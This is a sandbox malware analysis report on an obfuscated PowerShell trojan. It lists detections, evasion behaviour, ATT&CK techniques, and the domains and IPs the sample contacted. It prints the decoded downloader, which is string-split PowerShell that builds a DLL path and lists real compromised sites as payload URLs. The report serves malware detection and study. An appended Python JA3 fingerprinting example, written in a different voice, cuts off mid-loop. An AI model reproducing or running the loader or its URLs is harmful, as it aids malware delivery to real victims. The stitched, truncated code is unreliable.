Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp, type: MEMORY | Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: classification engine | Classification label: mal100.troj.evad.winPS1@4/15@9/7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Documents\20210518
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zoooqw21.rs0.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: ps_script.ps1 | Virustotal: Detection: 8%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation:

Suspicious powershell command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAEEA336E3 push eax; retf 2_2_00007FFAEEA336F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAEEA34091 pushfd ; retf 2_2_00007FFAEEA340F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAEEB06062 push E800000Dh; retf 2_2_00007FFAEEB06071
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAEEB077CA push es; ret 2_2_00007FFAEEB07837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFAEEB07812 push es; ret 2_2_00007FFAEEB07837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1331
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 685
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3071
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5941
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3820 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5548 Thread sleep count: 3071 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4840 Thread sleep count: 5941 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWS
Source: powershell.exe, 00000002.00000003.272680165.000001B6280C5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000002.00000002.325115555.000001B6283F0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded sEt MKu ( [TYPe]("{0}{1}{2}{4}{3}" -F 'SYsT','eM.','io.DI','ORY','rECt') ); SeT-iTEM ('vaR'+'IabLE'+':mBu') ( [TYPe]("{6}{8}{0}{3}{4}{5}{2}{7}{1}" -f'SteM','Ger','Ma','.n','et.seRVIcepOi','nt','s','NA','Y')); $ErrorActionPreference = (('S'+'il')+('en'+'t')+'ly'+('Cont'+'i'+'nue'));$Cvmmq4o=$Q26L + [char](64) + $E16H;$J16J=('N'+('_0'+'P')); (DIr VariabLE:Mku ).VaLUe::"c`REAt`edI`REC`TORy"($HOME + (('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92));$C39Y=(('U6'+'8')+'S'); ( vARiaBLe ("m"+"bu") -VAlueoN )::"sEcuRITYproT`o`c`ol" = ('T'+('ls'+'12'));$F35I=('I'+('4'+'_B'));$Swrp6tc = (('A6'+'9')+'S');$X27H=('C3'+'3O');$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l');$K47V=('R'+('4'+'9G'));$B9fhbyv=(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation

Mitre Att&ck Matrix

The matrix is listed per tactic below; a number in parentheses after a technique is the count of signatures in this report that matched it. Techniques without a number are part of the matrix template and were not observed.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Command and Scripting Interpreter (11); PowerShell (2); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (11); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Steganography; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Query Registry (1); Security Software Discovery (11); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (3); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph


Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
ps_script.ps1 | 8% | Virustotal | | Browse
ps_script.ps1 | 8% | Metadefender | | Browse
ps_script.ps1 | 10% | ReversingLabs | Script-PowerShell.Trojan.Heuristic |
ps_script.ps1 | 100% | Avira | TR/PowerShell.Gen |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label | Link
wm.mcdevelop.net | 7% | Virustotal | | Browse
etdog.com | 9% | Virustotal | | Browse
freelancerwebdesignerhyderabad.com | 6% | Virustotal | | Browse
www.hintup.com.br | 8% | Virustotal | | Browse

URLs


Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
wm.mcdevelop.net | 159.65.89.222 | true | true | | unknown
etdog.com | 45.116.14.210 | true | true | | unknown
freelancerwebdesignerhyderabad.com | 162.241.148.243 | true | true | | unknown
www.hintup.com.br | 172.67.223.27 | true | true | | unknown
admintk.com | 216.127.164.209 | true | false | | high
mikegeerinck.com | 35.214.199.246 | true | true | | unknown
www.stmarouns.nsw.edu.au | 143.204.98.64 | true | true | | unknown
x1.i.lencr.org | unknown | unknown | false | | unknown

          Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.stmarouns.nsw.edu.au/paypal/b8G/ | true | Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries


Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
162.241.148.243 | freelancerwebdesignerhyderabad.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
216.127.164.209 | admintk.com | United States | 35916 | MULTA-ASN1US | false
143.204.98.64 | www.stmarouns.nsw.edu.au | United States | 16509 | AMAZON-02US | true
159.65.89.222 | wm.mcdevelop.net | United States | 14061 | DIGITALOCEAN-ASNUS | true
45.116.14.210 | etdog.com | China | 4785 | XTOM-AS-JPxTomJP | true
35.214.199.246 | mikegeerinck.com | United States | 19527 | GOOGLE-2US | true
172.67.223.27 | www.hintup.com.br | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 416466
Start date: 18.05.2021
Start time: 15:52:39
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ps_script.ps1
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winPS1@4/15@9/7
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 13
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .ps1
Warnings:
• Excluded IPs from analysis (whitelisted): 92.122.145.220, 40.88.32.150, 52.255.188.83, 104.43.139.144, 184.30.20.56, 20.50.102.62, 104.83.124.33, 205.185.216.42, 205.185.216.10, 20.54.26.129, 20.82.209.183, 92.122.213.194, 92.122.213.247
• Excluded domains from analysis (whitelisted): e8652.dscx.akamaiedge.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
• Execution Graph export aborted for target powershell.exe, PID 5344 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5496 because it is empty

                                Simulations

Behavior and APIs

Time | Type | Description
15:53:35 | API Interceptor | 45x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

Match | Associated Sample Name / URL | Detection | Context

Match: 162.241.148.243
  ps_script.ps1 | malicious | freelancerwebdesignerhyderabad.com/cgi-bin/S/
  sample2.doc | malicious | freelancerwebdesignerhyderabad.com/cgi-bin/S/
  form.doc | malicious | freelancerwebdesignerhyderabad.com/cgi-bin/S/

Match: 216.127.164.209
  ps_script.ps1 | malicious | (no context)

Match: 159.65.89.222
  ps_script.ps1 | malicious | wm.mcdevelop.net/content/6F2gd/
  ps_script.ps1 | malicious | wm.mcdevelop.net/content/6F2gd/

Match: 45.116.14.210
  ps_script.ps1 | malicious | etdog.com/wp-content/nu/
  ps_script.ps1 | malicious | etdog.com/wp-content/nu/

Match: 35.214.199.246
  ps_script.ps1 | malicious | (no context)
  ps_script.ps1 | malicious | (no context)
  sample2.doc | malicious | (no context)
  form.doc | malicious | (no context)

Match: 172.67.223.27
  ps_script.ps1 | malicious | (no context)

                                            Domains

Match | Associated Sample Name / URL | Detection | Context

Match: freelancerwebdesignerhyderabad.com
  ps_script.ps1 | malicious | 162.241.148.243
  sample2.doc | malicious | 162.241.148.243
  form.doc | malicious | 162.241.148.243

Match: wm.mcdevelop.net
  ps_script.ps1 | malicious | 159.65.89.222

Match: www.hintup.com.br
  ps_script.ps1 | malicious | 172.67.223.27
  ps_script.ps1 | malicious | 104.21.54.33

Match: etdog.com
  ps_script.ps1 | malicious | 45.116.14.210
  ps_script.ps1 | malicious | 45.116.14.210

Match: www.stmarouns.nsw.edu.au
  ps_script.ps1 | malicious | 143.204.98.98
  ps_script.ps1 | malicious | 143.204.11.65

Match: admintk.com
  ps_script.ps1 | malicious | 216.127.164.209
  sample2.doc | malicious | 210.56.52.6
  form.doc | malicious | 210.56.52.6
  http://goodjobssolutions.com/mayo-clinic-nmk5w/WQDXUGGDH1memfhbzQba7kowTEW24A/ | malicious | 210.56.52.6
  http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/ | malicious | 210.56.52.6

Match: mikegeerinck.com
  ps_script.ps1 | malicious | 35.214.199.246
  ps_script.ps1 | malicious | 35.214.199.246
  sample2.doc | malicious | 35.214.199.246
  form.doc | malicious | 35.214.199.246

                                            ASN

Match | Associated Sample Name / URL | Detection | Context

Match: MULTA-ASN1US
  Shipment of your goods.exe | malicious | 198.211.22.67
  ps_script.ps1 | malicious | 216.127.164.209
  Purchase Order #330716.exe | malicious | 198.148.123.122
  NEW ORDER.exe | malicious | 198.211.22.67
  hvEop8Y70Y.exe | malicious | 198.148.114.222
  CUFUYO.exe | malicious | 108.166.197.79
  RFQ 6300306423.doc | malicious | 198.52.113.151
  gV8xdP8bas.exe | malicious | 66.152.187.17
  HUahIwV82u.exe | malicious | 66.152.179.11
  5r673DxGK8.exe | malicious | 198.211.22.80
  yqfUONVqpk.exe | malicious | 66.152.187.17
  2o0y7CvHF2.exe | malicious | 72.44.77.68
  N5eld3tiba.exe | malicious | 72.44.77.68
  Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | malicious | 198.52.105.123
  RdLlHaxEKP.exe | malicious | 173.82.229.126
  CMahQwuvAE.exe | malicious | 66.152.187.17
  Vghj5O8TF2rYH85.exe | malicious | 198.211.22.68
  hkcmd.exe | malicious | 66.152.187.17
  DNSmonitor.x86 | malicious | 198.211.10.10
  Agreement.xlsx | malicious | 66.152.187.17

Match: UNIFIEDLAYER-AS-1US
  Invoice 172850 paul@forthebiome.com.html | malicious | 198.1.102.16
  Proof_of_Payment.exe | malicious | 192.185.129.69
  PO.exe | malicious | 108.179.232.163
  invoice copy.pdf.exe | malicious | 192.185.136.173
  Shipment of your goods.exe | malicious | 162.241.61.214
  New Order_PO 1164_HD-F 4020 6K.exe | malicious | 162.241.24.143
  diagram-1698815848.xls | malicious | 162.241.27.24
  diagram-2107205359.xls | malicious | 216.172.184.172
  Comprobantedepago.exe | malicious | 192.185.129.69
  ps_script.ps1 | malicious | 162.241.148.243
  diagram-1439249772.xls | malicious | 162.241.27.24
  _S4737468_.html | malicious | 162.214.48.210
  lkmfwWQyu3.dll | malicious | 192.163.233.216
  lkmfwWQyu3.dll | malicious | 192.163.233.216
  ytUsz4l0Qo.php.dll | malicious | 192.163.233.216
  ytUsz4l0Qo.php.dll | malicious | 192.163.233.216
  catalog-458980479.xls | malicious | 108.167.188.238
  $RAULIU9.exe | malicious | 162.241.5.112
  play_audio_gail.chin@nationalmi.com_file.htm | malicious | 69.49.228.44
  vx6dGnJxS.dll | malicious | 192.163.233.216

Match: AMAZON-02US
  z7buieR7Xl.exe | malicious | 15.207.158.4
  PO.exe | malicious | 52.58.78.16
  Shipment of your goods.exe | malicious | 52.15.160.167
  44285,8901393519.dll | malicious | 13.225.75.73
  iteratorPasteGlobal.dll | malicious | 13.225.75.73
  New Order_PO 1164_HD-F 4020 6K.exe | malicious | 3.128.211.88
  proforma invoice.exe | malicious | 52.58.78.16
  ps_script.ps1 | malicious | 143.204.98.98
  Fences3-sd-setup.exe | malicious | 3.0.9.5
  vbProcedureLink.dll | malicious | 13.224.91.73
  $RAULIU9.exe | malicious | 54.65.44.217
  Click HERE to start the File Launcher by WebNavigator Installer_8kxrizjg_.exe | malicious | 13.224.193.78
  Doc3#089 Senasys, Inc.exe | malicious | 13.248.216.40
  malware.html | malicious | 34.252.166.160
  N0vktYxfuWjaTvG.exe | malicious | 13.232.164.78
  6163F584F65079263750327321F3D6CE71BC745F67B44.exe | malicious | 3.13.191.225
  AN3M8O5NwA.exe | malicious | 18.191.68.101
  ehbLUKWH81.exe | malicious | 18.185.153.48
  NzqOz8Fl59.exe | malicious | 52.216.185.131
  a6362829_by_Libranalysis.exe | malicious | 18.236.1.157

                                            JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context

Match: 3b5074b1b5d032e5620f69f9f700ff0e
  DHL Original Shipping Documents and BL.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  SecuriteInfo.com.Scr.Malcodegdn30.5930.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  BRW485F99CAF01F_007361.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  umoworldcorp4setup.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  ps_script.ps1 | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  Hexenmaister.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  CElX5IAwAg.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  WAnYq4Yh0Z.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  bIeqskeWm6.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  i.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  IqDf5xrxZL.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  Qc78opSY35.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  BUEyR2fRx9.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  hYIe5B4Xsz.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  ZqSGeV2yQd.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  tpdwIENhDh.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  NzqOz8Fl59.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  metina_2.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  xxrM0xh3us.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
  gt5V1dq88s.exe | malicious | 143.204.98.64, 35.214.199.246, 172.67.223.27
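The fingerprint above is a JA3 hash: the MD5 of a string assembled from the ClientHello's version, cipher suites, extension types, supported groups and EC point formats, with GREASE values dropped. The Python below is an added example, not code from the Joe Sandbox report or from JA3's authors, that builds a constructed ClientHello and derives its JA3 string and hash by that procedure. The sample hello, its cipher list and its extension contents are invented for the example and do not reproduce the PowerShell hello the sandbox captured.

```python
import hashlib
import struct

# GREASE values (RFC 8701) are stripped by JA3 so that clients which randomise
# them still hash to one fingerprint.
GREASE = {(i << 8) | i for i in range(0x0A, 0x100, 0x10)}


def build_client_hello(version, ciphers, extensions):
    """Serialise a TLS record carrying a ClientHello. `extensions` is a list of
    (type, data) pairs. Constructed input for this example only."""
    body = struct.pack(">H", version)
    body += b"\x11" * 32                              # client random, fixed here
    body += b"\x00"                                   # empty session id
    body += struct.pack(">H", 2 * len(ciphers))
    body += b"".join(struct.pack(">H", c) for c in ciphers)
    body += b"\x01\x00"                               # one compression method: null
    ext = b"".join(struct.pack(">HH", t, len(d)) + d for t, d in extensions)
    body += struct.pack(">H", len(ext)) + ext
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def ja3_string(record):
    """Parse a ClientHello record into the JA3 string
    'version,ciphers,extensions,groups,point_formats' (decimal, '-' separated)."""
    if record[:1] != b"\x16":
        raise ValueError("not a TLS handshake record")
    hs = record[5:]
    if hs[:1] != b"\x01":
        raise ValueError("not a ClientHello")
    pos = 4                                           # handshake type + 3-byte length
    (version,) = struct.unpack(">H", hs[pos:pos + 2]); pos += 2
    pos += 32                                         # random
    pos += 1 + hs[pos]                                # session id
    (cs_len,) = struct.unpack(">H", hs[pos:pos + 2]); pos += 2
    ciphers = [struct.unpack(">H", hs[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + hs[pos]                                # compression methods
    ext_types, groups, formats = [], [], []
    if pos + 2 <= len(hs):
        (ext_len,) = struct.unpack(">H", hs[pos:pos + 2]); pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
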